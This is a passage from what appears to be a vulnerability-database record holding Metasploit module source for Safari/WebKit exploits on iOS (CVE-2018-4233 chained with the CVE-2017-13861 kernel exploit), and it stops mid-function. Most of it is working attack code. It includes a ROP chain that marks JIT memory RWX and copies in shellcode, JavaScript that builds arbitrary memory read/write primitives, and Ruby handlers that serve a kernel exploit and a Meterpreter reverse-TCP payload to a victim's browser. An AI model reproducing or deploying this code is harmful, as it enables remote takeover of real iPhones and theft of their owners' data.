: '\n var opcodes = {\n // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28\n \"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],\n \"dispatch\": [\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ],\n // blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret\n [ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ],\n ],\n \"stackloader\": [\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ],\n // sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30];\n // ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret\n [ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ],\n ],\n };\n\n var opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ];\n '}\n\n var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));\n var nimgs = memory.u32(Add(hdr, 0x1c));\n for(var i = 0; i < nimgs; ++i)\n {\n var straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18)));\n var fn = function(i)\n {\n return memory.read(Add(straddr, i), 1)[0];\n };\n var base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide);\n if(opcode_libs.some(lib => strcmp(fn, lib)))\n {\n var ncmds = memory.u32(Add(base, 0x10));\n for(var j = 0, off = 0x20; j < ncmds; ++j)\n {\n var cmd = memory.u32(Add(base, off));\n if(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64\n {\n var nsects = memory.u32(Add(base, off + 0x40));\n for(var k = 0, o = off + 0x48; k < nsects; ++k)\n {\n if(strcmp(memory.read(Add(base, o), 0x10), \"__text\"))\n {\n var keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k])\n if (keys.length == 0) break;\n\n var addr = Add(memory.readInt64(Add(base, o + 0x20)), cache_slide)\n var size = memory.u32(Add(base, o + 0x28))\n\n // Copy the entire __text region into a Uint32Array for faster processing.\n // Previously you could map a Uint32Array over the data, but on i7+ devices\n // this caused access violations.\n // Instead we read the entire region and copy it into a Uint32Array. The\n // memory.read primitive has a weird limitation where it's only able to read\n // up to 4096 bytes. to get around this we'll read multiple times and combine\n // them into one.\n\n var allData = new Uint32Array(size / 4)\n for (var r = 0; r < size; r += 4096) {\n // Check to ensure we don't read out of the region we want\n var qty = 4096\n if (size - r < qty) {\n qty = size - r\n }\n var data = memory.read(Add(addr, r), qty)\n\n // Data is an array of single bytes. This code takes four entries\n // and converts them into a single 32-bit integer. It then adds it\n // into the `allData` array at the given index\n for (var h = 0; h < qty; h += 4) {\n var fourBytes = b2u32(data.slice(h, h + 4))\n allData[(r + h) / 4] = fourBytes\n }\n }\n\n // Loop through the entire data map looking for each gadget we need\n for (var f = 0; f < size && keys.length > 0; f++) {\n\n // Check every gadget\n for (var z = 0; z < keys.length; z++) {\n var key = keys[z];\n var opcode_list = opcodes[key];\n for (var y = 0; y < opcode_list.length; y++) {\n var opcode = opcode_list[y];\n for (var t = 0; t < opcode.length; t++) {\n var op = allData[f+t];\n if (op == opcode[t]) {\n if (t == opcode.length - 1) {\n gadgets[key] = Add(addr, f*4);\n keys.splice(z, 1);\n z = keys.length;\n break;\n }\n continue;\n }\n break;\n }\n }\n }\n }\n\n break;\n }\n o += 0x50;\n }\n break;\n }\n off += memory.u32(Add(base, off + 0x4));\n }\n continue;\n }\n var lookup = null;\n for(var k = Object.keys(libs), j = 0; j < k.length; ++j)\n {\n if(strcmp(fn, k[j]))\n {\n lookup = libs[k[j]];\n break;\n }\n }\n if(lookup != null)\n {\n fsyms(memory, base, segs, lookup, syms);\n }\n }\n\n var vals = Object.keys(libs).map(function(key) {\n return libs[key];\n });\n var k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(syms[s] == null)\n {\n fail(s);\n }\n syms[s] = Add(syms[s], cache_slide);\n }\n k = Object.keys(opcodes);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(gadgets[s] == null)\n {\n fail(s);\n }\n }\n\n offsets = {}\n offsets[\"regloader\"] = gadgets[\"regloader\"];\n offsets[\"dispatch\"] = gadgets[\"dispatch\"];\n offsets[\"stackloader\"] = gadgets[\"stackloader\"];\n offsets[\"ldrx8\"] = gadgets[\"ldrx8\"];\n offsets[\"movx4\"] = gadgets[\"movx4\"];\n offsets[\"__longjmp\"] = syms[\"__longjmp\"];\n offsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"];\n offsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"];\n offsets[\"_dlopen\"] = syms[\"_dlopen\"];\n offsets[\"_dlsym\"] = syms[\"_dlsym\"];\n offsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"];\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"];\n\n if (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) {\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8);\n }\n #{ ios_11 ? '\n if (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) {\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8);\n }' : ''}\n\n#{dump_offsets}\n\n }\n\n\n var regloader = offsets[\"regloader\"];\n var dispatch = offsets[\"dispatch\"];\n var stackloader = offsets[\"stackloader\"];\n var longjmp = offsets[\"__longjmp\"];\n var mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"];\n var memmove = offsets[\"__platform_memmove\"];\n var dlopen = offsets[\"_dlopen\"];\n var dlsym = offsets[\"_dlsym\"];\n var task_self = offsets[\"_mach_task_self_\"]\n var endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n var startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n\n var ldrx8 = offsets[\"ldrx8\"]; // might be null\n var movx4 = offsets[\"movx4\"]; // might be null\n\n var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());\n var memPoolEnd = memory.readInt64(endOfFixedMem);\n\n var memPoolStart = Int64.Zero;\n if (startOfFixedMem) {\n memPoolStart = memory.readInt64(startOfFixedMem);\n }\n\n var jitWriteSeparateHeaps = Int64.Zero;\n if (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) {\n jitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]);\n }\n\n var shsz = new Int64(\"0x100000\");\n var paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10));\n var codeAddr = Sub(memPoolEnd, shsz);\n codeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff);\n\n memory.writeInt64(Add(vtab, 0x18), longjmp);\n memory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget)\n\n var arrsz = 0x100000,\n off = 0x1000;\n var arr = new Uint32Array(arrsz);\n var stack = memory.readInt64(Add(stage1.addrof(arr), 0x10));\n\n var pos = arrsz - off;\n\n var add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) {\n x4 = x4 || Int64.Zero\n\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = dispatch.lo(); // x28 (gadget for regloader)\n arr[pos++] = dispatch.hi(); // x28 (gadget for regloader)\n arr[pos++] = 0xdead0014; // x27 (unused)\n arr[pos++] = 0xdead0015; // x27 (unused)\n arr[pos++] = x4.lo(); // x26 == x4 (arg5)\n arr[pos++] = x4.hi(); // x26 == x4 (arg5)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x2.lo(); // x24 == x2 (arg3)\n arr[pos++] = x2.hi(); // x24 == x2 (arg3)\n arr[pos++] = x0.lo(); // x23 == x0 (arg1)\n arr[pos++] = x0.hi(); // x23 == x0 (arg1)\n arr[pos++] = x1.lo(); // x22 == x1 (arg2)\n arr[pos++] = x1.hi(); // x22 == x1 (arg2)\n arr[pos++] = func.lo(); // x21 (func)\n arr[pos++] = func.hi(); // x21 (func)\n arr[pos++] = 0xdbad0018; // x20 (unused)\n arr[pos++] = 0xdbad0019; // x20 (unused)\n arr[pos++] = 0xdead001a; // x19 (unused)\n arr[pos++] = 0xdead001b; // x19 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29\n arr[pos++] = regloader.lo(); // x30 (first gadget)\n arr[pos++] = regloader.hi(); // x30 (first gadget)\n\n // after dispatch:\n arr[pos++] = 0xdead0020; // unused\n arr[pos++] = 0xdead0021; // unused\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) {\n //alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`);\n //x4 = x4 || Int64.One\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = 0xdead1101; // x28 (unused)\n arr[pos++] = 0xdead1102; // x28 (unused)\n arr[pos++] = 0xdead0014; // x27 == x6 (unused)\n arr[pos++] = 0xdead0015; // x27 == x6 (unused)\n arr[pos++] = 0xdead0016; // x26 (unused)\n arr[pos++] = 0xdead0017; // x26 (unused)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x0.lo(); // x24 == x0 (arg1)\n arr[pos++] = x0.hi(); // x24 == x0 (arg1)\n arr[pos++] = x2.lo(); // x23 == x2 (arg3)\n arr[pos++] = x2.hi(); // x23 == x2 (arg3)\n arr[pos++] = x3.lo(); // x22 == x3 (arg4)\n arr[pos++] = x3.hi(); // x22 == x3 (arg4)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdead0018; // x20 (unused)\n arr[pos++] = 0xdead0019; // x20 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdead001c; // x29 (unused)\n arr[pos++] = 0xdead001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n if (x4) {\n arr[pos++] = stackloader.lo();\n arr[pos++] = stackloader.hi();\n } else {\n arr[pos++] = dispatch.lo(); // x8 (target for regloader)\n arr[pos++] = dispatch.hi(); // x8 (target for regloader)\n }\n arr[pos++] = 0xdead1401; // (unused)\n arr[pos++] = 0xdead1402; // (unused)\n arr[pos++] = 0xdead1301; // x20 (unused)\n arr[pos++] = 0xdead1302; // x20 (unused)\n arr[pos++] = x1.lo(); // x19 == x1 (arg2)\n arr[pos++] = x1.hi(); // x19 == x1 (arg2)\n arr[pos++] = 0xdead1201; // x29 (unused)\n arr[pos++] = 0xdead1202; // x29 (unused)\n arr[pos++] = regloader.lo(); // x30 (next gadget)\n arr[pos++] = regloader.hi(); // x30 (next gadget)\n\n // in regloader\n // NOTE: REGLOADER DOES NOT ADJUST SP!\n // sometimes i didn't get expected value in x4\n // and i have no earthly idea why\n // usleep likely did the trick, but I would still keep the code\n // with movx4\n //arr[pos++] = x4.lo() // x4 (should be -- but see lines above)\n //arr[pos++] = x4.hi() // x4 (should be -- but see lines above)\n\n if (x4) {\n // in stackloader:\n arr[pos++] = 0xdaad0010; // unused\n arr[pos++] = 0xdaad0011; // unused\n arr[pos++] = 0xdaad0012; // unused\n arr[pos++] = 0xdaad0013; // unused\n arr[pos++] = 0xdaad1101; // x28 (unused)\n arr[pos++] = 0xdaad1102; // x28 (unused)\n arr[pos++] = 0xdaad0014; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0015; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0016; // x26 (unused)\n arr[pos++] = 0xdaad0017; // x26 (unused)\n arr[pos++] = 0xdaad0018; // x25 (unused)\n arr[pos++] = 0xdaad0019; // x25 (unused)\n arr[pos++] = 0xdaad00f0; // x24 (unused)\n arr[pos++] = 0xdaad00f1; // x24 (unused)\n arr[pos++] = 0xdaad00f2; // x23 (unused)\n arr[pos++] = 0xdaad00f3; // x23 (unused)\n arr[pos++] = 0xdaad00f4; // x22 (unused)\n arr[pos++] = 0xdaad00f5; // x22 (unused)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdaad0018; // x20 (unused)\n arr[pos++] = 0xdaad0019; // x20 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdaad001c; // x29 (unused)\n arr[pos++] = 0xdaad001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n arr[pos++] = dispatch.lo(); // x8 (target for movx4)\n arr[pos++] = dispatch.hi(); // x8 (target for movx4)\n arr[pos++] = 0xdaad1401; // (unused)\n arr[pos++] = 0xdaad1402; // (unused)\n arr[pos++] = x4.lo(); // x20 == x4 (arg5)\n arr[pos++] = x4.hi(); // x20 == x4 (arg5)\n arr[pos++] = 0xdaad1301; // x19 (unused)\n arr[pos++] = 0xdaad1302; // x19 (unused)\n arr[pos++] = 0xdaad1201; // x29 (unused)\n arr[pos++] = 0xdaad1202; // x29 (unused)\n arr[pos++] = movx4.lo(); // x30 (next gadget)\n arr[pos++] = movx4.hi(); // x30 (next gadget)\n }\n\n // after dispatch:\n\n // keep only one: these or 0xdeaded01\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n arr[pos++] = 0xdead002c; // x29 (unused)\n arr[pos++] = 0xdead002d; // x29 (unused)\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call = function(func, x0, x1, x2, x3, x4, jump_to) {\n x0 = x0 || Int64.Zero\n x1 = x1 || Int64.Zero\n x2 = x2 || Int64.Zero\n x3 = x3 || Int64.Zero\n jump_to = jump_to || stackloader\n\n return (ldrx8 ? add_call_via_x8 : add_call_llvm)(\n func, x0, x1, x2, x3, x4, jump_to\n )\n }\n\n #{ios_11 ? '\n if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {\n add_call(jitWriteSeparateHeaps\n , Sub(codeAddr, memPoolStart) // off\n , paddr // src\n , shsz // size\n );\n } else {\n fail(\"jitWrite\");\n }\n ' : '\n add_call(mach_vm_protect,\n mach_task_self_, // task\n codeAddr, // addr\n shsz, // size\n new Int64(0), // set maximum\n new Int64(7) // prot (RWX)\n );\n\n add_call(memmove,\n codeAddr, // dst\n paddr, // src\n shsz // size\n );\n '}\n\n add_call(codeAddr,\n dlopen,\n dlsym,\n jitWriteSeparateHeaps,\n memPoolStart,\n memPoolEnd,\n );\n\n for(var i = 0; i < 0x20; ++i)\n {\n arr[pos++] = 0xde00c0de + (i<<16);\n }\n\n var sp = Add(stack, (arrsz - off) * 4);\n memory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29\n memory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp)\n\n // trigger\n //print(\"u rdy?\")\n wrapper.addEventListener(\"click\", function(){});\n\n}\n\n#{get_mem_rw}\n\nfunction go() {\n try {\n var req = new XMLHttpRequest;\n req.open(\"GET\", \"exploit\");\n req.responseType = \"arraybuffer\";\n req.addEventListener(\"load\", function() {\n try {\n if (req.responseType != \"arraybuffer\") throw \"y u no blob\";\n payload.set(new Uint8Array(req.response), 0x0);\n pwn();\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n });\n req.addEventListener(\"error\", function(ev) {\n fail(ev)\n });\n req.send()\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n};\n\ngo();\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/\\/\\/.*$/, '') # strip comments\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/apple_ios/browser/webkit_createthis.rb"}, {"lastseen": "2020-10-14T07:31:08", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.\n", "published": "2019-06-02T02:19:24", "type": "metasploit", "title": "Safari Webkit Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13861", "CVE-2018-4233"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The type confusion leads to the ability to allocate fake Javascript objects,\n as well as the ability to find the address in memory of a Javascript object.\n This allows us to construct a fake JSCell object that can be used to read\n and write arbitrary memory from Javascript. The module then uses a ROP chain\n to write the first stage shellcode into executable memory within the Safari\n process and kick off its execution.\n\n The first stage maps the second stage macho (containing CVE-2017-13861) into\n executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\n kernel memory. The processes credential and sandbox structure in the kernel\n is overwritten and the meterpreter payloads code signature hash is added to\n the kernels trust cache, allowing Safari to load and execute the (self-signed)\n meterpreter payload.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo',\n 'niklasb',\n 'Ian Beer',\n 'siguza',\n ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2017-13861'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],\n ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],\n ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],\n ],\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'apple_ios',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n OptBool.new('DUMP_OFFSETS', [false, \"Show newly found offsets in a javascript prompt\", false]),\n ])\n end\n\n def payload_url\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\n end\n\n def get_version(user_agent)\n if user_agent =~ /OS (.*?) like Mac OS X\\)/\n ios_version = Gem::Version.new($1.gsub(\"_\", \".\"))\n return ios_version\n end\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\n end\n\n def on_request_uri(cli, request)\n if request.uri =~ %r{/apple-touch-icon*}\n return\n elsif request.uri =~ %r{/favicon*}\n return\n elsif request.uri =~ %r{/payload10$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha1 iOS 10 payload\")\n return\n elsif request.uri =~ %r{/payload11$*}\n payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_good(\"Sent sha256 iOS 11 payload\")\n return\n end\n\n user_agent = request['User-Agent']\n print_status(\"Requesting #{request.uri} from #{user_agent}\")\n version = get_version(user_agent)\n ios_11 = (version >= Gem::Version.new('11.0.0'))\n if request.uri =~ %r{/exploit$}\n loader_data = exploit_data('CVE-2017-13861', 'exploit')\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, config.length] = config\n print_good(\"Sent async_wake exploit\")\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n end\n\n get_mem_rw_ios_10 = %Q^\nfunction get_mem_rw(stage1) {\n var structs = [];\n function sprayStructures() {\n function randomString() {\n return Math.random().toString(36).replace(/[\\^a-z]+/g, \"\").substr(0, 5)\n }\n for (var i = 0; i < 4096; i++) {\n var a = new Float64Array(1);\n a[randomString()] = 1337;\n structs.push(a)\n }\n }\n sprayStructures();\n var hax = new Uint8Array(4096);\n var jsCellHeader = new Int64([0, 16, 0, 0, 0, 39, 24, 1]);\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: false,\n vector: hax,\n lengthAndFlags: (new Int64(\"0x0001000000000010\")).asJSValue()\n };\n var address = Add(stage1.addrof(container), 16);\n var fakearray = stage1.fakeobj(address);\n while (!(fakearray instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue()\n }\n memory = {\n read: function(addr, length) {\n fakearray[2] = i2f(addr);\n var a = new Array(length);\n for (var i = 0; i < length; i++) a[i] = hax[i];\n return a\n },\n readInt64: function(addr) {\n return new Int64(this.read(addr, 8))\n },\n write: function(addr, data) {\n fakearray[2] = i2f(addr);\n for (var i = 0; i < data.length; i++) hax[i] = data[i]\n },\n writeInt64: function(addr, val) {\n return this.write(addr, val.bytes())\n },\n };\n var empty = {};\n var header = memory.read(stage1.addrof(empty), 8);\n memory.write(stage1.addrof(container), header);\n var f64array = new Float64Array(8);\n header = memory.read(stage1.addrof(f64array), 16);\n memory.write(stage1.addrof(fakearray), header);\n memory.write(Add(stage1.addrof(fakearray), 24), [16, 0, 0, 0, 1, 0, 0, 0]);\n fakearray.container = container;\n return memory;\n}\n^\n\n get_mem_rw_ios_11 = %Q^\nfunction get_mem_rw(stage1) {\n var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10;\n var structure_spray = []\n for (var i = 0; i < 1000; ++i) {\n var ary = {a:1,b:2,c:3,d:4,e:5,f:6,g:0xfffffff}\n ary['prop'+i] = 1\n structure_spray.push(ary)\n }\n var manager = structure_spray[500]\n var leak_addr = stage1.addrof(manager)\n //print('leaking from: '+ hex(leak_addr))\n function alloc_above_manager(expr) {\n var res\n do {\n for (var i = 0; i < ALLOCS; ++i) {\n structure_spray.push(eval(expr))\n }\n res = eval(expr)\n } while (stage1.addrof(res) < leak_addr)\n return res\n }\n var unboxed_size = 100\n var unboxed = alloc_above_manager('[' + '13.37,'.repeat(unboxed_size) + ']')\n var boxed = alloc_above_manager('[{}]')\n var victim = alloc_above_manager('[]')\n // Will be stored out-of-line at butterfly - 0x10\n victim.p0 = 0x1337\n function victim_write(val) {\n victim.p0 = val\n }\n function victim_read() {\n return victim.p0\n }\n i32[0] = 0x200 // Structure ID\n i32[1] = 0x01082007 - 0x10000 // Fake JSCell metadata, adjusted for boxing\n var outer = {\n p0: 0, // Padding, so that the rest of inline properties are 16-byte aligned\n p1: f64[0],\n p2: manager,\n p3: 0xfffffff, // Butterfly indexing mask\n }\n var fake_addr = stage1.addrof(outer) + FPO + 0x8;\n //print('fake obj @ ' + hex(fake_addr))\n var unboxed_addr = stage1.addrof(unboxed)\n var boxed_addr = stage1.addrof(boxed)\n var victim_addr = stage1.addrof(victim)\n //print('leak ' + hex(leak_addr)\n //+ ' unboxed ' + hex(unboxed_addr)\n //+ ' boxed ' + hex(boxed_addr)\n //+ ' victim ' + hex(victim_addr))\n var holder = {fake: {}}\n holder.fake = stage1.fakeobj(fake_addr)\n // From here on GC would be uncool\n // Share a butterfly for easier boxing/unboxing\n var shared_butterfly = f2i(holder.fake[(unboxed_addr + 8 - leak_addr) / 8])\n var boxed_butterfly = holder.fake[(boxed_addr + 8 - leak_addr) / 8]\n holder.fake[(boxed_addr + 8 - leak_addr) / 8] = i2f(shared_butterfly)\n var victim_butterfly = holder.fake[(victim_addr + 8 - leak_addr) / 8]\n function set_victim_addr(where) {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = i2f(where + 0x10)\n }\n function reset_victim_addr() {\n holder.fake[(victim_addr + 8 - leak_addr) / 8] = victim_butterfly\n }\n var stage2 = {\n addrof: function(victim) {\n boxed[0] = victim\n return f2i(unboxed[0])\n },\n fakeobj: function(addr) 